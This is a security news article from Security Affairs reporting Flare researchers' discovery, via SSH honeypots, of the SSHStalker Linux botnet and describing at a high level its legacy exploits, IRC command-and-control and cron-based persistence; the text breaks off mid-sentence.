SSHStalker botnet targets Linux servers with legacy exploits and SSH scanning
SSHStalker botnet targets Linux servers with legacy exploits and SSH scanning
Publish Date: 2026-02-11 05:08:00
Source Domain: securityaffairs.com
SSHStalker botnet targets Linux servers with legacy exploits and SSH scanning
Pierluigi Paganini
February 11, 2026
A new Linux botnet, SSHStalker, has infected about 7,000 systems using old 2009-era exploits, IRC bots, and mass-scanning malware.
Flare researchers uncovered a previously undocumented Linux botnet dubbed SSHStalker, observed via SSH honeypots over two months. Researchers ran an SSH honeypot with weak credentials starting in early 2026 and spotted a set of intrusions unlike any previously reported activity. After checking threat intel databases, vendor reports, and malware repositories, they confirmed this activity as new and named it SSHStalker. The botnet combines old-school 2009-era IRC botnet tactics with modern automated mass-compromise techniques.
“We’ve designated this operation “SSHStalker” due to its distinctive behavior: the botnet maintained persistent access without executing any observable impact operations, despite having in its arsenal capabilities to launch DDoS attacks and conduct cryptomining.” reads the report published by Flare. “This “dormant persistence” pattern—infecting systems and establishing control without immediate monetization—differentiates it from typical opportunistic botnet operations and suggests either infrastructure staging, testing phases, or strategic access retention for future use.”
SSHStalker relies on IRC as its command-and-control backbone, using multiple C-based bots, Perl scripts, and known malware families like Tsunami and Keiten. Attacks are highly automated, chaining SSH scanners with rapid staging, on-host compilation, and automatic enrollment into IRC channels to scale infections quickly.
The researchers pointed out that the persistence mechanism implemented by the botnet is noisy but effective, using cron jobs that relaunch the malware within about a minute if disrupted. The toolkit mixes log…
